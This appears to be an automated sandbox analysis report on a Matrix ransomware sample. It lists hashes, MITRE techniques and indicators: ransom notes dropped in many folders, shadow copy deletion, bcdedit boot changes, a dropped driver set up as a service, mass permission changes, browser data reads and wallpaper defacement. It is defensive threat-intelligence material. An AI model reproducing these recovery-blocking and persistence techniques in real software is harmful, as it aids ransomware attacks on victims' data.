matrix | 0ade46c70e72d18fa408e8b0a79791363f5fb52f34a0924829f936bf1d3e9085

Analysis

max time kernel
597s
max time network
360s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
30-12-2023 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
Size

6.5MB
MD5

1a699d18fc42426c1fdfe7ad01a42d20
SHA1

f8b0d7c0019f48ffb8f6d0f0634104751cc5842f
SHA256

095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270
SHA512

b6c0abad59318341f2ce0c9057df1d3dfe6421da36519b15927bbe769807ca007761bc47a64e69513ddb9d9cd02f8f2df6bce755a5c26adfadacd62da08ba253
SSDEEP

196608:ugY5Wpp0209r4M3jtxMTdLZ4jSonnP6TH3DwGP:Y5Wp0202A/ConuP

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3470981204-343661084-3367201002-1000\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Solitaire\fr-FR\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Public\Documents\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Media Player\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Public\Pictures\Sample Pictures\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Purble Place\it-IT\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jre7\lib\management\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\1033\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jre7\lib\fonts\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\FreeCell\es-ES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\Favorites\MSN Websites\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.151\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Mozilla Firefox\browser\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\en-US\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Google\Update\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Hearts\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4296	bcdedit.exe
3624	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	3KvhBUKy64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	3KvhBUKy64.exe

Executes dropped EXE 64 IoCs

pid	Process
2508	takeown.exe
3432	3KvhBUKy.exe
1584	3KvhBUKy64.exe
2884	Process not Found
1664	Process not Found
4536	Process not Found
4604	Process not Found
3276	Process not Found
3284	Process not Found
1152	Process not Found
4100	Process not Found
4744	Process not Found
3848	Process not Found
4164	Process not Found
4212	Process not Found
4356	Process not Found
4400	Process not Found
4448	Process not Found
4784	Process not Found
2560	Process not Found
2604	Process not Found
2416	Process not Found
5052	Process not Found
1356	Process not Found
5104	Process not Found
5020	Process not Found
4980	Process not Found
4840	Process not Found
1644	Process not Found
3920	Process not Found
2616	Process not Found
3980	Process not Found
4004	Process not Found
380	Process not Found
3912	Process not Found
1828	Process not Found
2076	Process not Found
2984	Process not Found
1776	Process not Found
2768	Process not Found
3024	Process not Found
600	cacls.exe
568	Process not Found
1072	Process not Found
1284	Process not Found
1228	Process not Found
1884	Process not Found
3312	Process not Found
3576	Process not Found
1680	Process not Found
4324	Process not Found
1668	Process not Found
3132	Process not Found
1176	Process not Found
2728	Process not Found
1464	3KvhBUKy.exe
1940	Process not Found
712	Process not Found
3452	Process not Found
3420	Process not Found
1208	3KvhBUKy.exe
492	Process not Found
1840	Process not Found
4252	Process not Found

Loads dropped DLL 64 IoCs

pid	Process
2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
2004	cmd.exe
3432	3KvhBUKy.exe
1840	Process not Found
3520	Process not Found
3500	Process not Found
3240	Process not Found
3176	Process not Found
1748	Process not Found
1540	takeown.exe
3332	Process not Found
4644	Process not Found
4700	Process not Found
4160	Process not Found
4124	Process not Found
4352	Process not Found
4216	Process not Found
4440	Process not Found
1660	Process not Found
3384	Process not Found
4452	Process not Found
1872	Process not Found
5048	Process not Found
2680	Process not Found
3400	Process not Found
5024	Process not Found
4104	Process not Found
4852	Process not Found
4928	Process not Found
2716	Process not Found
4976	Process not Found
3964	Process not Found
1372	Process not Found
1752	Process not Found
1756	Process not Found
2360	cmd.exe
2156	Process not Found
1428	Process not Found
1616	Process not Found
2736	cmd.exe
1532	Process not Found
2536	Process not Found
2340	Process not Found
984	Process not Found
1488	Process not Found
4188	Process not Found
3776	Process not Found
4588	Process not Found
1676	Process not Found
2672	Process not Found
4660	Process not Found
4012	Process not Found
2868	Process not Found
1844	cmd.exe
3660	Process not Found
3628	Process not Found
4024	Process not Found
4204	cacls.exe
324	Process not Found
2300	Process not Found
3644	Process not Found
2132	Process not Found
3252	Process not Found

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2260	takeown.exe
4684	takeown.exe
1540	takeown.exe
4980	takeown.exe
4340	takeown.exe
2388	takeown.exe
4852	takeown.exe
1960	takeown.exe
2716	takeown.exe
2440	takeown.exe
2724	takeown.exe
3544	Process not Found
3772	takeown.exe
4508	takeown.exe
1708	takeown.exe
4196	Process not Found
4264	takeown.exe
3772	takeown.exe
3040	takeown.exe
4184	takeown.exe
4560	takeown.exe
4848	takeown.exe
1168	Process not Found
3236	takeown.exe
2692	takeown.exe
4092	takeown.exe
3672	takeown.exe
2884	takeown.exe
5048	takeown.exe
2108	Process not Found
1964	Process not Found
4876	takeown.exe
3848	takeown.exe
3292	takeown.exe
4564	takeown.exe
4428	takeown.exe
3988	takeown.exe
4392	Process not Found
2904	Process not Found
4312	Process not Found
3140	takeown.exe
4036	Process not Found
4320	Process not Found
4344	Process not Found
2612	takeown.exe
3500	takeown.exe
2856	Process not Found
3364	takeown.exe
4012	takeown.exe
2224	Process not Found
1628	Process not Found
2300	takeown.exe
3060	takeown.exe
2352	Process not Found
4180	Process not Found
1636	Process not Found
3896	Process not Found
3920	Process not Found
4756	takeown.exe
4428	takeown.exe
3900	takeown.exe
212	takeown.exe
3112	takeown.exe
3540	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 41 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3432-3141-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4536-7285-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3284-7304-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4100-7316-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1152-7311-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3284-7305-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1748-7301-0x0000000000280000-0x00000000002F7000-memory.dmp	upx
behavioral1/memory/2616-7418-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3920-7415-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1644-7412-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/files/0x00090000000141b0-7408.dat	upx
behavioral1/memory/4840-7407-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4852-7405-0x00000000002A0000-0x0000000000317000-memory.dmp	upx
behavioral1/memory/4980-7401-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4980-7400-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5020-7396-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5104-7391-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1356-7387-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/5052-7383-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2416-7379-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2416-7378-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2604-7374-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2604-7373-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2560-7369-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4784-7365-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4784-7364-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4448-7360-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4400-7355-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4356-7348-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4212-7344-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4164-7341-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3848-7334-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3848-7333-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4744-7328-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3276-7299-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/3276-7297-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4604-7291-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/4536-7286-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/1664-7279-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2884-7272-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral1/memory/2884-7270-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 41 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UK06G3BB\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3I8TNX97\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\6S505ELS\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\D5NM0E2V\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\J:	3KvhBUKy64.exe
File opened (read-only)	\??\R:	3KvhBUKy64.exe
File opened (read-only)	\??\T:	3KvhBUKy64.exe
File opened (read-only)	\??\U:	3KvhBUKy64.exe
File opened (read-only)	\??\X:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\T:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\Q:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\U:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\P:	3KvhBUKy64.exe
File opened (read-only)	\??\M:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\J:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\A:	3KvhBUKy64.exe
File opened (read-only)	\??\E:	3KvhBUKy64.exe
File opened (read-only)	\??\G:	3KvhBUKy64.exe
File opened (read-only)	\??\W:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\R:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\P:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\S:	3KvhBUKy64.exe
File opened (read-only)	\??\Y:	3KvhBUKy64.exe
File opened (read-only)	\??\L:	3KvhBUKy64.exe
File opened (read-only)	\??\N:	3KvhBUKy64.exe
File opened (read-only)	\??\K:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\H:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\E:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\K:	3KvhBUKy64.exe
File opened (read-only)	\??\O:	3KvhBUKy64.exe
File opened (read-only)	\??\Y:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\V:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\L:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\S:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\I:	3KvhBUKy64.exe
File opened (read-only)	\??\Z:	3KvhBUKy64.exe
File opened (read-only)	\??\I:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\B:	3KvhBUKy64.exe
File opened (read-only)	\??\X:	3KvhBUKy64.exe
File opened (read-only)	\??\H:	3KvhBUKy64.exe
File opened (read-only)	\??\M:	3KvhBUKy64.exe
File opened (read-only)	\??\Q:	3KvhBUKy64.exe
File opened (read-only)	\??\V:	3KvhBUKy64.exe
File opened (read-only)	\??\W:	3KvhBUKy64.exe
File opened (read-only)	\??\Z:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\O:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened (read-only)	\??\N:	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
